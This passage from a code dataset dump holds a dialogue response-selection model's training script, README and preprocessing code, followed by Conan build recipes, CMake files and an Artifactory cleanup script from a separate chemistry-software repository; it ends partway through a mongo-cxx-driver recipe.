data_batch_size[args.task]\nargs.save_path += args.task + '.' + MSN.__name__ + \".pt\"\nargs.score_file_path = task_dic[args.task] + args.score_file_path\n\nprint(args)\nprint(\"Task: \", args.task)\n\n\ndef train_model():\n path = task_dic[args.task]\n X_train_utterances, X_train_responses, y_train = pickle.load(file=open(path+\"train.pkl\", 'rb'))\n X_dev_utterances, X_dev_responses, y_dev = pickle.load(file=open(path+\"test.pkl\", 'rb'))\n vocab, word_embeddings = pickle.load(file=open(path + \"vocab_and_embeddings.pkl\", 'rb'))\n #make_key_r(X_train_responses)\n #make_key_r(X_dev_responses)\n key_r=np.load('./dataset/ubuntu_data/key_r.npy')\n key_mask_r=np.load('./dataset/ubuntu_data/key_mask_r.npy')\n dev_key_r = np.load('./dataset/ubuntu_data/dev_key_r.npy')\n dev_key_mask_r = np.load('./dataset/ubuntu_data/dev_key_mask_r.npy')\n #make_key_r(X_train_responses[500000:1000000],2)\n #idx2sentnece(X_train_utterances, X_train_responses, X_dev_utterances, X_dev_responses, vocab, y_train)\n '''\n k=1000\n X_train_utterances=X_train_utterances[:k]\n X_train_responses=X_train_responses[:k]\n y_train=y_train[:k]\n X_dev_utterances= X_dev_utterances[:k]\n X_dev_responses=X_dev_responses[:k]\n y_dev=y_dev[:k]\n key_r, key_mask_r=key_r[:k], key_mask_r[:k]\n dev_key_r, dev_key_mask_r=dev_key_r[:k],dev_key_mask_r[:k]\n '''\n\n\n model = MSN(word_embeddings, args=args)\n model.fit(\n X_train_utterances, X_train_responses, y_train,\n X_dev_utterances, X_dev_responses, y_dev,\n key_r,key_mask_r,dev_key_r,dev_key_mask_r\n )\n\ndef get_key(sentence, max_seq_len, max_len):\n \"\"\"\n get key mask\n :param sentence:\n :param max_len:\n :return:\n \"\"\"\n ubuntu_cmd_vec = pickle.load(file=open(\"./dataset/ubuntu_data/command_description.pkl\", 'rb'))\n\n key_mask = np.zeros((max_seq_len))\n keys = np.zeros((max_seq_len, max_len))\n for j, word in enumerate(sentence):\n if int(word) in ubuntu_cmd_vec.keys():\n keys[j] = ubuntu_cmd_vec[int(word)][:max_len]\n key_mask[j] = 1\n else:\n keys[j] = np.zeros((max_len))\n return key_mask, keys\n\ndef make_key_r(X_train_responses):\n X_train_shape=np.array(X_train_responses).shape\n key_r = np.zeros([X_train_shape[0],X_train_shape[1],44], np.float32)\n key_mask_r = np.zeros([X_train_shape[0], X_train_shape[1]], np.float32)\n for j, row_r in enumerate(X_train_responses):\n key_mask_r[j], key_r[j] = get_key(row_r, X_train_shape[1], 44)\n np.save('./dataset/ubuntu_data/key_r.npy',key_r)\n np.save('./dataset/ubuntu_data/key_mask_r.npy', key_mask_r)\n '''\n if ver==1:\n pickle.dump([ key_r, key_mask_r], file=open(\"./dataset/ubuntu_data/key_r&key_mask_r_1.pkl\", 'wb'))\n else:\n pickle.dump([key_r, key_mask_r], file=open(\"./dataset/ubuntu_data/key_r&key_mask_r_2.pkl\", 'wb'))\n '''\ndef idx2sentnece(train_u, train_r, dev_u, dev_r, vocab, y_train):\n\n # tokenized_texts=tokenized_texts = [bert_tokenizer.tokenize(\"i am hppy\")]\n # print (tokenized_texts[0])\n\n reverse_vocab = {v: k for k, v in vocab.items()}\n\n train_bu = [] # 총 백만.\n for i, context in enumerate(train_u): # context len =10\n context_b = []\n if (i % 100000 == 0):\n print(i)\n\n for utterance in context: # utterance max =50\n utterance_b = \"\"\n for word_idx in utterance:\n if (word_idx == 0): continue\n utterance_b += reverse_vocab[word_idx] + \" \"\n if (len(utterance_b) == 0):\n continue\n\n utterance_b = utterance_b[:-1]\n # print(utterance_b)\n\n\n # utterance_t+= [0 for i in range(50-len(utterance_t))]#맥스 단어가 50임 빠끄\n context_b.append(utterance_b)\n train_bu.append(context_b)\n\n train_br = []\n\n for utterance, y in zip(train_r, y_train): # utterance max =1문장\n utterance_b = \"\"\n for word_idx in utterance:\n if (word_idx == 0): continue\n utterance_b += reverse_vocab[word_idx] + \" \"\n '''\n if (len(utterance_b) == 0):#백만개에서 줄어듬......\n print(\"response missing!~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\n continue\n '''\n utterance_b = utterance_b[:-1]\n # utterance_t += [0 for i in range(50 - len(utterance_t))]\n train_br.append(utterance_b)\n # print(utterance_t)\n print(\"end\")\n pickle.dump([train_bu, train_br], file=open(\"sentence/train_ori.pkl\", 'wb'))\n\n dev_bu = [] # 총 백만.\n for context in dev_u: # context len =10\n context_b = []\n for utterance in context: # utterance max =50\n utterance_b = \"\"\n for word_idx in utterance:\n if (word_idx == 0): continue\n utterance_b += reverse_vocab[word_idx] + \" \"\n\n if (len(utterance_b) == 0):\n continue\n utterance_b = utterance_b[:-1]\n # print(utterance_b)\n\n # utterance_t += [0 for i in range(50 - len(utterance_t))]\n context_b.append(utterance_b)\n dev_bu.append(context_b)\n\n dev_br = []\n for utterance in dev_r: # utterance max =1문장\n utterance_b = \"\"\n for word_idx in utterance:\n if (word_idx == 0): continue\n utterance_b += reverse_vocab[word_idx] + \" \"\n '''\n if (len(utterance_b) == 0):\n continue\n '''\n utterance_b = utterance_b[:-1]\n # utterance_t += [0 for i in range(50 - len(utterance_t))]\n dev_br.append(utterance_b)\n\n pickle.dump([dev_bu, dev_br], file=open(\"sentence/dev_ori.pkl\", 'wb'))\n\n\ndef test_model():\n path = task_dic[args.task]\n X_test_utterances, X_test_responses, y_test = pickle.load(file=open(path+\"test.pkl\", 'rb'))\n vocab, word_embeddings = pickle.load(file=open(path + \"vocab_and_embeddings.pkl\", 'rb'))\n\n model = MSN(word_embeddings, args=args)\n model.load_model(args.save_path)\n model.evaluate(X_test_utterances, X_test_responses, y_test, is_test=True)\n\ndef test_adversarial():\n path = task_dic[args.task]\n vocab, word_embeddings = pickle.load(file=open(path + \"vocab_and_embeddings.pkl\", 'rb'))\n model = MSN(word_embeddings, args=args)\n model.load_model(args.save_path)\n print(\"adversarial test set (k=1): \")\n X_test_utterances, X_test_responses, y_test = pickle.load(file=open(path+\"test_adversarial_k_1.pkl\", 'rb'))\n model.evaluate(X_test_utterances, X_test_responses, y_test, is_test=True)\n print(\"adversarial test set (k=2): \")\n X_test_utterances, X_test_responses, y_test = pickle.load(file=open(path+\"test_adversarial_k_2.pkl\", 'rb'))\n model.evaluate(X_test_utterances, X_test_responses, y_test, is_test=True)\n print(\"adversarial test set (k=3): \")\n X_test_utterances, X_test_responses, y_test = pickle.load(file=open(path+\"test_adversarial_k_3.pkl\", 'rb'))\n model.evaluate(X_test_utterances, X_test_responses, y_test, is_test=True)\n\n\nif __name__ == '__main__':\n start = time.time()\n if args.is_training:\n train_model()\n test_model()\n else:\n test_model()\n # test_adversarial()\n end = time.time()\n print(\"use time: \", (end-start)/60, \" min\")\n\n\n\n\n"
},
{
"alpha_fraction": 0.7760778665542603,
"alphanum_fraction": 0.806675910949707,
"avg_line_length": 41.117645263671875,
"blob_id": "9a162917ca3bbfdb462b044836ac1b3d98469413",
"content_id": "55cfcd0bbc15c4615d3d8da35c3a93542f1c4e84",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 801,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 17,
"path": "/README.md",
"repo_name": "hanjanghoon/NLP_Dialog_MSN-PyramidNet-Domain-Knowledge",
"src_encoding": "UTF-8",
"text": "# NLP_Dialog_MSN-PyramidNet-Domain-Knowledge\nMulti-hop selector + pyramidnet + Domain knowledge\n\n### Multi-hop Selector Network for Multi-turn Response Selection in Retrieval-based Chatbots\nhttps://www.aclweb.org/anthology/D19-1011.pdf\n\n### Improving Response Selection in Multi-turn Dialogue Systems by Incorporating Domain Knowledge\nhttps://www.aclweb.org/anthology/K18-1048.pdf\n\n### Deep Pyramidal Residual Networks\nhttps://arxiv.org/pdf/1610.02915.pdf\n\nUbuntu data V1, Response selection\n\nmulti-hop selector의 Aggregation 부분을 PyramidNet으로 대체 하여 성능을 향상\n\nImproving Response Selection in Multi-turn Dialogue Systems by Incorporating Domain Knowledge 에서 사용된 방법(manual command를 BIGRU encoding) 통해 외부지식을 함께 사용하여 성능을 향상\n\n\n\n"
},
{
"alpha_fraction": 0.5875912308692932,
"alphanum_fraction": 0.6040145754814148,
"avg_line_length": 30.342857360839844,
"blob_id": "39fd8c7793a84419c64f893bccafedaa850b4736",
"content_id": "dfbe08b12006b8df4306fef1260cdec24242eda7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1096,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 35,
"path": "/makedesdict.py",
"repo_name": "hanjanghoon/NLP_Dialog_MSN-PyramidNet-Domain-Knowledge",
"src_encoding": "UTF-8",
"text": "import pickle\nimport numpy as np\ntarget_vocab, word_embeddings = pickle.load(file=open(\"./dataset/ubuntu_data/vocab_and_embeddings.pkl\", 'rb'))\nubuntu_cmd_vec = np.load('./dataset/AKdict/command_description.npy').item()\nvocab = open('./dataset/AKdict/vocab.txt', 'r').readlines()\nid2w = {}\nfor word in vocab:\n w = word.split('\\n')[0].split('\\t')\n id2w[int(w[1])] = w[0]\n\nnewvector={}\ncnt=0\nfor i in ubuntu_cmd_vec:\n\n if id2w[i] not in target_vocab:\n #print(\"pass\")\n #cnt+=1\n continue\n t = target_vocab[id2w[i]]\n change=[]\n des_list=ubuntu_cmd_vec[i]\n for k in range(len(des_list)):\n cnt += 1\n if des_list[k]==0:\n break\n if id2w[des_list[k]] not in target_vocab:\n print(\"pass\")\n change.append(target_vocab['unk'])\n continue\n change.append(target_vocab[id2w[des_list[k]]])\n change.extend([0] * (44 - len(change)))\n newvector[t]=change\npickle.dump(newvector, file=open(\"./dataset/ubuntu_data/command_description.pkl\", 'wb'))\n #print(i,id2w[i],target_vocab[id2w[i]])\nprint(cnt)"
}
] | 3 |
qcscine/conan-recipes | https://github.com/qcscine/conan-recipes | 5ed683d2a05e5af3e741b3a1b78085073297a345 | 7d1e1561e899afb65d2ed209cdcfd80beb4a8ef7 | 38ffa5f359e12c6cf8291bd20b8d8c5812f89344 | refs/heads/master | 2023-01-19T17:32:02.058400 | 2020-11-27T11:32:23 | 2020-11-27T11:33:37 | 316,483,623 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6533219814300537,
"alphanum_fraction": 0.6643952131271362,
"avg_line_length": 29.894737243652344,
"blob_id": "dfd8ba75b16ba14638989f9beaefd4d69ed6663e",
"content_id": "27bef9c453505c6ea18320d20e0eedd1f3ed1207",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1174,
"license_type": "permissive",
"max_line_length": 156,
"num_lines": 38,
"path": "/artifactory-scripts/delete-old-pkgs.py",
"repo_name": "qcscine/conan-recipes",
"src_encoding": "UTF-8",
"text": "__copyright__ = \"\"\"This code is licensed under the 3-clause BSD license.\nCopyright ETH Zurich, Laboratory of Physical Chemistry, Reiher Group.\nSee LICENSE.txt for details.\n\"\"\"\n\nfrom artifactory_api import ArtifactoryAPI\nimport sys\n\n\"\"\"\nNOTE:\n- Conan package order: name/version@user/channel\n E.g. scine_molassembler/1.0.0@ci/develop\n- Artifactory storage order: user/name/version/channel\n E.g. ci/scine_molassembler/version/develop\n\n\"\"\"\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 4:\n raise RuntimeError(\n \"Supply the Artifactory repository URL (e.g. http://localhost:8082/artifactory/api/conan/scine-internal), a username and password as arguments\")\n\n full_api = sys.argv[1]\n\n # Determine api base part\n splat = full_api.split(\"/\")\n api_idx = splat.index(\"api\")\n api_base = \"/\".join(splat[:api_idx])\n repo_name = splat[-1]\n\n user = sys.argv[2]\n passw = sys.argv[3]\n\n api = ArtifactoryAPI(api_base=api_base, auth=(user, passw))\n old_pkgs = api.list_old_packages(repo_name, \"scine\")\n for pkg in old_pkgs:\n print(\"{}: {}\".format(pkg, api.get_last_updated(repo_name, pkg)))\n api.delete(repo_name, pkg)\n"
},
{
"alpha_fraction": 0.7644444704055786,
"alphanum_fraction": 0.7733333110809326,
"avg_line_length": 27.125,
"blob_id": "a2a65ae6c131607dd577e6411cf7ed1ac92f2bff",
"content_id": "3e530f6f735ef19d4f9ecc40544528e054c4b111",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 225,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 8,
"path": "/hdf5/CMakeLists.txt",
"repo_name": "qcscine/conan-recipes",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 3.6)\nproject(cmake_wrapper)\n\ninclude(${CMAKE_CURRENT_BINARY_DIR}/../conanbuildinfo.cmake)\nconan_basic_setup()\n\nenable_testing()\nadd_subdirectory(${CMAKE_CURRENT_BINARY_DIR}/../source_subfolder)\n"
},
{
"alpha_fraction": 0.5718162655830383,
"alphanum_fraction": 0.5747237801551819,
"avg_line_length": 39.622047424316406,
"blob_id": "6177c16e0cb7ced469839679a43eb2c301d6a581",
"content_id": "1727093f8e73d7c5cf62e0e287752119eae19771",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5159,
"license_type": "permissive",
"max_line_length": 140,
"num_lines": 127,
"path": "/artifactory-scripts/artifactory_api.py",
"repo_name": "qcscine/conan-recipes",
"src_encoding": "UTF-8",
"text": "__copyright__ = \"\"\"This code is licensed under the 3-clause BSD license.\nCopyright ETH Zurich, Laboratory of Physical Chemistry, Reiher Group.\nSee LICENSE.txt for details.\n\"\"\"\n\nimport pytz\nimport requests\nimport sys\nfrom datetime import datetime, timedelta\n\n\nclass ArtifactoryAPI(object):\n def __init__(self, api_base, auth):\n \"\"\" Initialize API class with base URI and authentication tuple \"\"\"\n self.api_base = api_base\n self.auth = auth\n\n def api(self, path):\n return \"/\".join([self.api_base, path])\n\n def get_conan_repositories(self):\n \"\"\" Fetch list of conan repositories in the artifactory \"\"\"\n api_path = self.api(\"api/repositories?type=local&packageType=conan\")\n r = requests.get(api_path, auth=self.auth)\n if not r.ok:\n msg = \"Got response {} for GET {}\".format(r.status_code, api_path)\n raise RuntimeError(msg)\n\n return [d[\"key\"] for d in r.json()]\n\n def get_path_list_base(self, repo, path):\n \"\"\" Base fn for directory listings \"\"\"\n api_path = self.api(\"api/storage/{}/{}\".format(repo, path))\n r = requests.get(api_path, auth=self.auth)\n if not r.ok:\n msg = \"Got response {} for GET {}\".format(r.status_code, api_path)\n raise RuntimeError(msg)\n\n return r.json()\n\n def get_subdirectories(self, repo, path):\n \"\"\" Get list of subdirectories for a path \"\"\"\n listing = self.get_path_list_base(repo, path)\n return [d[\"uri\"].lstrip(\"/\") for d in listing[\"children\"] if d[\"folder\"]]\n\n def get_last_updated(self, repo, path):\n \"\"\" Get date object for last updated time of a path \"\"\"\n # Only in Python 3.7 onwards does %z correclty interpret +01:00 suffix\n # to date format\n\n if sys.version_info.major >= 3 and sys.version_info.minor >= 7:\n date_str = self.get_path_list_base(repo, path)[\"lastUpdated\"]\n date_format_str = \"%Y-%m-%dT%H:%M:%S.%f%z\"\n return datetime.strptime(date_str, date_format_str)\n\n date_str = self.get_path_list_base(repo, path)[\"lastUpdated\"]\n plus_idx = date_str.index(\"+\")\n date_str = date_str[:plus_idx]\n date_format_str = \"%Y-%m-%dT%H:%M:%S.%f\"\n return datetime.strptime(date_str, date_format_str)\n\n def older_than(self, delta, repo, path):\n \"\"\" Returns if a package is older than a supplied time delta \"\"\"\n last_updated = self.get_last_updated(repo, path)\n if sys.version_info.major >= 3 and sys.version_info.minor >= 7:\n now = datetime.now(pytz.utc)\n else:\n now = datetime.now()\n return (now - last_updated) > delta\n\n def delete(self, repo, path):\n \"\"\" Deletes a path from the artifactory \"\"\"\n api_path = self.api(\"{}/{}\".format(repo, path))\n r = requests.delete(api_path, auth=self.auth)\n if not r.ok:\n raise RuntimeError(\n \"Got response {} for DELETE {}\".format(r.status_code, api_path)\n )\n\n def list_old_packages(self, repo, user, old_package_delta=timedelta(days=1), preserve_channels=[\"stable\", \"master\"], preserve_newest=3):\n \"\"\"\n Lists old packages that could be deleted\n\n Descends along user-name-version-channel folder hierarchy. In each\n channel folder:\n\n - If a channel is in preserve_channels, skips the channel\n - Sorts packages by age\n - Preserves newest packages as specified by preserve_newest\n - Selects packages older than old_package_delta\n\n Returns a list of full paths to package directories\n \"\"\"\n if sys.version_info.major >= 3 and sys.version_info.minor >= 7:\n now = datetime.now(pytz.utc)\n else:\n now = datetime.now()\n\n old_packages = []\n for name in self.get_subdirectories(repo, user):\n inc_path = \"/\".join([user, name])\n for version in self.get_subdirectories(repo, inc_path):\n inc_path = \"/\".join([user, name, version])\n for channel in self.get_subdirectories(repo, inc_path):\n if channel in preserve_channels:\n continue\n\n pkgs_path = \"/\".join([user, name, version, channel])\n\n def lookup_age(pkg):\n return self.get_last_updated(repo, \"/\".join([pkgs_path, pkg]))\n\n pkgs = self.get_subdirectories(repo, pkgs_path)\n # Sort packages by date created (newer first, older last)\n sorted_pkgs = sorted(pkgs, key=lookup_age, reverse=True)\n # Always preserve n newest packages\n non_preserved = sorted_pkgs[preserve_newest:]\n # Select packages older than set delta\n older_pkgs = [pkg for pkg in non_preserved\n if now - lookup_age(pkg) > old_package_delta]\n\n # Add to old packages\n old_packages.extend(\n [\"/\".join([pkgs_path, pkg]) for pkg in older_pkgs]\n )\n\n return old_packages\n"
},
{
"alpha_fraction": 0.7714285850524902,
"alphanum_fraction": 0.7714285850524902,
"avg_line_length": 22.33333396911621,
"blob_id": "08b3a19a5fec997ceeb68b2a3b2c4ec650aafb84",
"content_id": "01fd9ddfbd3fc1adc9de76f6ff7cb6354439b0d0",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 70,
"license_type": "permissive",
"max_line_length": 53,
"num_lines": 3,
"path": "/nauty/config.cmake.in",
"repo_name": "qcscine/conan-recipes",
"src_encoding": "UTF-8",
"text": "include(${CMAKE_CURRENT_LIST_DIR}/nautyTargets.cmake)\n\n@PACKAGE_INIT@\n"
},
{
"alpha_fraction": 0.6206128001213074,
"alphanum_fraction": 0.6278551816940308,
"avg_line_length": 30.491228103637695,
"blob_id": "f0855c742fe7cd6c407f464f8fa6512b8c59657c",
"content_id": "87e4b5bfe995feea46675bc9cf7beeb802995ffc",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1795,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 57,
"path": "/xtb/conanfile.py",
"repo_name": "qcscine/conan-recipes",
"src_encoding": "UTF-8",
"text": "__copyright__ = \"\"\"This code is licensed under the 3-clause BSD license.\nCopyright ETH Zurich, Laboratory of Physical Chemistry, Reiher Group.\nSee LICENSE.txt for details.\n\"\"\"\n\nimport os\nfrom conans import ConanFile, CMake, tools\n\n\nclass XtbConanfile(ConanFile):\n name = \"xtb\"\n version = \"6.3.2\"\n description = \"Semiempirical Extended Tight-Binding Program Package\"\n topics = (\"conan\", \"quantum-chemistry\", \"chemistry\")\n url = \"https://github.com/grimme-lab/xtb\"\n homepage = \"https://www.chemie.uni-bonn.de/pctc/mulliken-center/software/xtb/xtb\"\n license = \"LGPL-3.0-only\"\n exports = \"portable-linalg.patch\"\n exports_sources = \"CMakeLists.txt\"\n generators = \"cmake\"\n\n settings = \"os\", \"compiler\", \"arch\", \"build_type\"\n options = {\"shared\": [True, False], \"fPIC\": [True, False]}\n default_options = {\"shared\": False, \"fPIC\": True}\n\n requires = [\n \"cmake/[>=3.18.0]@scine/stable\",\n \"lapack/3.7.1@conan/stable\"\n ]\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def source(self):\n remote = \"https://github.com/grimme-lab/xtb/archive/v{}.tar.gz\"\n tools.get(remote.format(self.version))\n extracted_dir = self.name + \"-\" + self.version\n os.rename(extracted_dir, \"sources\")\n tools.patch(base_path=\"sources\", patch_file=\"portable-linalg.patch\")\n\n def _configure_cmake(self):\n cmake = CMake(self)\n cmake.configure()\n return cmake\n\n def build(self):\n cmake = self._configure_cmake()\n cmake.build()\n\n def package(self):\n self.copy(pattern=\"sources/COPYING*\", dst=\"licenses\", keep_path=False)\n cmake = self._configure_cmake()\n cmake.install()\n\n def package_info(self):\n pass\n"
},
{
"alpha_fraction": 0.7526488900184631,
"alphanum_fraction": 0.7555717825889587,
"avg_line_length": 30.102272033691406,
"blob_id": "758be9dfc4e2a0058b31cd6345030836ea70700c",
"content_id": "4f51df6ad24de90cbf80178901d5d3061012848e",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 2737,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 88,
"path": "/nauty/CMakeLists.txt",
"repo_name": "qcscine/conan-recipes",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 3.6)\nproject(nauty VERSION 2.7)\n\ninclude(${CMAKE_BINARY_DIR}/conanbuildinfo.cmake)\nconan_basic_setup()\n\nset(NAUTY_HEADERS\n ${CMAKE_CURRENT_BINARY_DIR}/sources/gtools.h\n ${CMAKE_CURRENT_BINARY_DIR}/sources/gutils.h\n ${CMAKE_CURRENT_BINARY_DIR}/sources/naugroup.h\n ${CMAKE_CURRENT_BINARY_DIR}/sources/naugstrings.h\n ${CMAKE_CURRENT_BINARY_DIR}/sources/naurng.h\n ${CMAKE_CURRENT_BINARY_DIR}/sources/nausparse.h\n ${CMAKE_CURRENT_BINARY_DIR}/sources/nautaux.h\n ${CMAKE_CURRENT_BINARY_DIR}/sources/nautinv.h\n ${CMAKE_CURRENT_BINARY_DIR}/sources/naututil.h\n ${CMAKE_CURRENT_BINARY_DIR}/sources/nauty.h\n ${CMAKE_CURRENT_BINARY_DIR}/sources/planarity.h\n ${CMAKE_CURRENT_BINARY_DIR}/sources/quarticirred28.h\n ${CMAKE_CURRENT_BINARY_DIR}/sources/rng.h\n ${CMAKE_CURRENT_BINARY_DIR}/sources/schreier.h\n ${CMAKE_CURRENT_BINARY_DIR}/sources/traces.h\n)\n\nset(NAUTY_SOURCES\n ${CMAKE_CURRENT_BINARY_DIR}/sources/gtnauty.c\n ${CMAKE_CURRENT_BINARY_DIR}/sources/gtools.c\n ${CMAKE_CURRENT_BINARY_DIR}/sources/gutil1.c\n ${CMAKE_CURRENT_BINARY_DIR}/sources/gutil2.c\n ${CMAKE_CURRENT_BINARY_DIR}/sources/naugraph.c\n ${CMAKE_CURRENT_BINARY_DIR}/sources/naugroup.c\n ${CMAKE_CURRENT_BINARY_DIR}/sources/naurng.c\n ${CMAKE_CURRENT_BINARY_DIR}/sources/nausparse.c\n ${CMAKE_CURRENT_BINARY_DIR}/sources/nautil.c\n ${CMAKE_CURRENT_BINARY_DIR}/sources/nautinv.c\n ${CMAKE_CURRENT_BINARY_DIR}/sources/naututil.c\n ${CMAKE_CURRENT_BINARY_DIR}/sources/nauty.c\n ${CMAKE_CURRENT_BINARY_DIR}/sources/schreier.c\n ${CMAKE_CURRENT_BINARY_DIR}/sources/traces.c\n)\n\nadd_library(nauty ${NAUTY_HEADERS} ${NAUTY_SOURCES})\ntarget_include_directories(nauty PUBLIC\n $<BUILD_INTERFACE:${CMAKE_CURRENT_SOURCE_DIR}>\n $<INSTALL_INTERFACE:$<INSTALL_PREFIX>/include>\n)\ninstall(\n DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}/sources/\n DESTINATION include/nauty\n FILES_MATCHING PATTERN \"*.h\"\n)\n\ninstall(\n FILES ${CMAKE_CURRENT_BINARY_DIR}/sources/COPYRIGHT\n DESTINATION share/doc/nauty/licenses\n)\ninstall(TARGETS nauty EXPORT nautyTargets ARCHIVE DESTINATION lib)\n\ninclude(CMakePackageConfigHelpers)\nwrite_basic_package_version_file(\n \"${CMAKE_CURRENT_BINARY_DIR}/nautyConfigVersion.cmake\"\n VERSION ${nauty_VERSION}\n COMPATIBILITY AnyNewerVersion\n)\n\nconfigure_package_config_file(\n \"config.cmake.in\"\n \"${CMAKE_CURRENT_BINARY_DIR}/nautyConfig.cmake\"\n INSTALL_DESTINATION \"lib/cmake/nauty\"\n)\n\ninstall(\n FILES\n \"${CMAKE_CURRENT_BINARY_DIR}/nautyConfigVersion.cmake\"\n \"${CMAKE_CURRENT_BINARY_DIR}/nautyConfig.cmake\"\n DESTINATION \"lib/cmake/nauty\"\n)\n\nexport(\n EXPORT nautyTargets\n FILE \"${CMAKE_CURRENT_BINARY_DIR}/nautyTargets.cmake\"\n)\n\ninstall(\n EXPORT nautyTargets\n FILE \"nautyTargets.cmake\"\n DESTINATION \"lib/cmake/nauty\"\n)\n"
},
{
"alpha_fraction": 0.5876755714416504,
"alphanum_fraction": 0.6039873361587524,
"avg_line_length": 30.08450698852539,
"blob_id": "f687a888ee318072689c476a722b54b29e28cb71",
"content_id": "5f8da4871d68b989055a03a904a713c5031ac5cd",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2207,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 71,
"path": "/irc/conanfile.py",
"repo_name": "qcscine/conan-recipes",
"src_encoding": "UTF-8",
"text": "__copyright__ = \"\"\"This code is licensed under the 3-clause BSD license.\nCopyright ETH Zurich, Laboratory of Physical Chemistry, Reiher Group.\nSee LICENSE.txt for details.\n\"\"\"\n\nfrom conans import ConanFile, CMake, tools\nimport shutil\n\n\nclass IrcConanfile(ConanFile):\n name = \"irc\"\n version = \"6d5c7c37\"\n description = \"Internal Redundant Coordinates\"\n topics = (\"conan\", \"quantum-chemistry\", \"chemistry\")\n url = \"https://github.com/rmeli/irc\"\n license = \"MIT\"\n exports_sources = \"CMakeLists.txt\"\n generators = \"cmake\"\n\n settings = \"os\", \"compiler\", \"arch\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n \"tests\": [True, False]\n }\n default_options = {\"shared\": False, \"fPIC\": True, \"tests\": False}\n requires = [\n \"eigen/[~=3.3.7]@conan/stable\",\n \"boost/[>1.58.0]@conan/stable\"\n ]\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def source(self):\n # NOTE: Update this when release hits\n # remote = \"https://github.com/RMeli/irc/archive/{}.tar.gz\"\n # tools.get(remote.format(self.version))\n # extracted_dir = self.name + \"-\" + self.version\n # os.rename(extracted_dir, \"sources\")\n # Use the master branch\n self.run(\"git clone https://github.com/rmeli/irc.git\")\n self.run(\"cd irc && git checkout 6d5c7c372d02ecdbd50f8981669c46ddae0638ac\")\n shutil.move(\"irc\", \"sources\")\n\n def _configure_cmake(self):\n cmake = CMake(self)\n cmake.definitions[\"WITH_EIGEN\"] = True\n cmake.definitions[\"BUILD_TESTS\"] = self.options.tests\n cmake.configure()\n return cmake\n\n def build(self):\n cmake = self._configure_cmake()\n cmake.build()\n cmake.test()\n\n def package(self):\n self.copy(pattern=\"sources/LICENSE\",\n dst=\"licenses\", keep_path=False)\n cmake = self._configure_cmake()\n cmake.install()\n\n def package_id(self):\n # Remove test option from package id computation\n delattr(self.info.options, \"tests\")\n self.info.header_only()\n\n def package_info(self):\n pass\n"
},
{
"alpha_fraction": 0.6267845034599304,
"alphanum_fraction": 0.6331294178962708,
"avg_line_length": 38.75675582885742,
"blob_id": "e47661d6834ecd577d132ebca4506229a1b8d568",
"content_id": "0e81000a4b536a9d447d6f6468be7e0fd98141c2",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4413,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 111,
"path": "/mongo-cxx-driver/conanfile.py",
"repo_name": "qcscine/conan-recipes",
"src_encoding": "UTF-8",
"text": "__copyright__ = \"\"\"This code is licensed under the 3-clause BSD license.\nCopyright ETH Zurich, Laboratory of Physical Chemistry, Reiher Group.\nSee LICENSE.txt for details.\n\"\"\"\n\nfrom conans import ConanFile, CMake, tools\nfrom conans.errors import ConanInvalidConfiguration\nimport os\n\n\nclass MongoCxxConan(ConanFile):\n name = \"mongo-cxx-driver\"\n version = \"3.4.0\"\n url = \"http://github.com/bincrafters/conan-mongo-cxx-driver\"\n description = \"C++ Driver for MongoDB\"\n license = \"Apache-2.0\"\n settings = \"os\", \"compiler\", \"arch\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n \"polyfill\": [\"std\", \"boost\", \"mnmlstc\", \"experimental\"]\n }\n default_options = {\"shared\": False, \"fPIC\": True, \"polyfill\": \"boost\"}\n requires = \"mongo-c-driver/1.16.1@scine/stable\"\n build_requires = \"cmake/[>3.13.4]@scine/stable\"\n exports = \"link_dl.patch\"\n generators = \"cmake\"\n\n _cmake = None\n _source_subfolder = \"source_subfolder\"\n _build_subfolder = \"build_subfolder\"\n\n def configure(self):\n if self.settings.compiler == 'Visual Studio' and self.options.polyfill != \"boost\":\n raise ConanInvalidConfiguration(\n \"For MSVC, best to use the boost polyfill\")\n\n tools.check_min_cppstd(self, \"11\")\n\n if self.options.polyfill == \"std\":\n tools.check_min_cppstd(self, \"17\")\n\n if self.options.polyfill == \"boost\":\n self.requires(\"boost_optional/1.69.0@bincrafters/stable\")\n self.requires(\"boost_smart_ptr/1.69.0@bincrafters/stable\")\n\n # Cannot model mnmlstc (not packaged, is pulled dynamically) or\n # std::experimental (how to check availability in stdlib?) polyfill\n # dependencies\n\n def source(self):\n remote = \"https://github.com/mongodb/mongo-cxx-driver/archive/r{0}.tar.gz\"\n tools.get(remote.format(self.version))\n 